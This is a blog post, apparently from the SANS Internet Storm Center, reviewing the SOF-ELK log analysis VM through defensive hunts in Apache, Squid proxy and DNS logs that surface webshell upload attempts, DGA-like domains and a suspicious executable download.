SOF-ELK has a great README, dont be that person, read it. Its everything you need to get started, in one place. What!? :-)
Better yet, you can download a fully realized VM with almost no configuration requirements, so you can hit the ground running. I ran my SOF-ELK instance with VMWare Workstation 12 Pro and no issues other than needing to temporarily disable Device Guard and Credential Guard on Windows 10.
SOF-ELK offers some good test data to get you started with right out of the gate, in /home/elk_user/exercise_source_logs, including Syslog from a firewall, router, converted Windows events, a Squid proxy, and a server named muse. You can drop these on your SOF-ELK server in the/logstash/syslog/ ingestion point for syslog-formatted data. Additionally, utilize /logstash/nfarch/ for archived NetFlow output, /logstash/httpd/ for Apache logs, /logstash/passivedns/ for logs from the passivedns utility, /logstash/plaso/ for log2timeline, and /logstash/bro/ for, yeah, you guessed it.
I mixed things up a bit and added my own Apache logs for the month of May to /logstash/httpd/. The muse log set in the exercise offering also included a DNS log (named_log), for grins I threw that in the /logstash/syslog/as well just to see how it would play.
Run down a few data rabbit holes with me, I swear I can linger for hours on end once I latch on to something to chase. Well begin with a couple of highlights from my Apache logs. The SOF-ELK VM comes with three pre-configured dashboards including Syslog, NetFlow, and HTTPD. You can learn more in the start page for the SOF-ELK UI, my instance is http://192.168.50.110:5601/app/kibana. There are three panels, or blocks, for each dashboards details, at the bottom of the UI. I drilled through to theHTTPD Log Dashboard for this experiment, and immediately reset the time period for analysis (click the time marker in the upper right hand part of the UI). It defaults to the last 15 minutes, if youre reviewing older data it wont show until you adjust to match your time stamps. My data is from the month of May so I selected an absolute window from the beginning of May to its end. You can also select quick or relative time options, it width:400px" /> Figure 1: HTTPD Log Dashboard

Nice! An event count summary, source ASNs by count (you can immediately see where I scanned myself from work), a fantastic Access Source map, a records graph by HTTP verbs, and one by response codes.
The beauty of these SOF-ELK dashboards is that theyre immediately interactive and allow you to drill right in to interesting data points. The holisticinfosec.org website is intentionally flat and includes no active PHP or dynamic content. As a result, my favorite response code as a web application security tester, the 500 error, is notably missing. But, in both the timeline graphs we note a big traffic spike on 8 MAY 2017, which correlates nicely with my above mention scan from work, as noted in the ASN hit count, and seen here in Figure 2.
width:400px" /> Figure 2: Traffic spike from scan

This visualizes well but isnt really all that interesting or uncommon, particularly given that I know I personally ran the scan, and scans from the Intarwebs are dime a dozen. What did jump out for me though, as seen back in Figure 1, was the presence of four PUT requests. Thats usually a bad thing where some@$$h@t is trying to drop something on my server. Lets drill in a bit, shall we? After clicking the graph line with the four PUT requests, I quickly learned that two requests came from 204.12.194.234AS32097: WholeSale Internet in Kansas City, MO and two came from119.23.233.9 AS37963: Hangzhou Alibaba Advertising in Hangzhou, China. This is well represented in the HTTPD Access Source panel map (Figure 3).
width:400px" /> Figure 3: Access Source

The PUT request from each included a txt file attempt, specifically dbhvf99151.txt and htjfx99555.txt, both were rejected, redirected (302), and sent to my landing page (200).
Research on the IPs found that 119.23.233.9 was on the real time suspected malware list as detected by InterServers intrusion systems as seen 22 MAY, and 204.12.194.234 was found twice in the AbuseIPDB, flagged on 18 MAY 2017 forCknife Webshell Detected. Now were talking. Its common to attempt a remote file include attack or a PUT, with what is a web shell. I opened up SOF-ELK on that IP address and found eight total hits in my logs, all looking for common PHP opportunities with the likes of GET and POST for/plus/mytag_js.php, width:400px" /> Figure 4: Discovery

Thats a groovy little hunting trip through HTTPD logs, but how about a bit of Syslog? I spotted I likely oddity that could be correlated across a number of the exercise logs, well see if the correlation is real. Youll notice tabs at the top of your SOF-ELK UI, well use Discover for this experiment. I started from the Syslog Dashboard with my time range set broadly on the last two months. 7606 records presented themselves, sliced neatly by hosts and programs, as seen in Figure 5.
width:400px" /> Figure 5: Syslog Dashboard

Squid proxy logs showed the predominance of host entries (6778 or 57.95% of 11,696 to be specific), so I started there. Don laugh, but Ill often do keyword queries just to see what comes up, sometimes you land a pointer to a good rabbit hole. Within the body of 6778 proxy events, I searched malware. Two hits came back for GET request via a JS redirector to bleepingcomputer.com for your basic how-to based on random websites opening in Chrome width:400px" /> Figure 6: Malware keyword

More importantly, we have an IP address to pivot on:10.3.59.53. A search of that IP across the same 6778 Squid logs yielded 3896 entries specific to this IP, and lots to be curious about:

  • datingukrainewomen.com
  • anastasiadate.com
  • YouTube videos for hair loss
  • crowdscience.com for random pop-ups driving me nuts

Do I need to build this user profile out for you, or are you with me? Proxy logs tell us so much, and are deeply worthy of your blue team efforts to collect and review.
I jumped over to the named_log from the muse host to see what else might reveal itself. Heres where I jumped to Discover, the Splunk-like query functionality inherent to SOF-ELK (and ELK implemetations). I did reductive query to see what other oddities might surface:10.3.59.53 AND dns_query: (*.co.uk OR *.de OR *.eu OR *.info OR *.cc OR *.online OR *.website). I used these TLDs based on the premise that bots using Domain Generation Algorithms (DGA) will often use the TLDs. See The DGA of PadCrypt to learn more, as well as ISC Diary handler John Bambaneks OSINT logic. The query results were quite satisfying, 29 hits, including a number of clearly randomly generated domains. Those that were most interesting all included the .cc TLD, so I zoomed in further. Down to five hits with Figure 7:. CC TLD hits

Oh man, not good. I had a hunch now, and went back to the proxy logs with10.3.59.53 AND squid_request:*.exe. And there you have it, ladies and gentlemen, hunch rewarded (Figure 8).
width:400px" /> Figure 8: taxdocs.exe

It taxdocs.exe isnt malware, Im a monkeys uncle. Unfortunately, I could find no online references to these .cc domains or the .exe sample or URL, but you get the point. Given that its exercise data, Phil may have generated it to entice to dig deeper.
When we think about the IOC patterns for Petya, a hunt like this is pretty revealing. Petyas initial infection appears to involve a software supply-chain threat involving the Ukrainian company M.E.Doc, which develops tax accounting software, MEDoc. This is not Petya (as far as I know) specifically but we see pattern similarities for sure, one can learn a great deal about the sheep and the wolves. Be the sheepdog!
Few tools better in the free and open source arsenal to help you train and enhance your inner digital sheepdog than SOF-ELK. Im a sheepdog. I live to protect the flock and confront the wolf. ~LTC Dave Grossman, from On Combat.
text-align:center">

Believe it or not, theres a ton more you can do with SOF-ELK, consider this a primer and a motivator.
I LOVE SOF-ELK. Phil, well done, thank you. Readers rejoice, this is really one of my favorites for toolsmith, hands down, out of the now 126 unique tools discussed over more than ten years. Download the VM, and get to work herding. :-)
Cheers...until next time.

Russ McRee|@holisticinfosec

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security

All times are GMT +2. The time now is 09:37.


©2001-2017 - Baanboard.com - Baanforums.com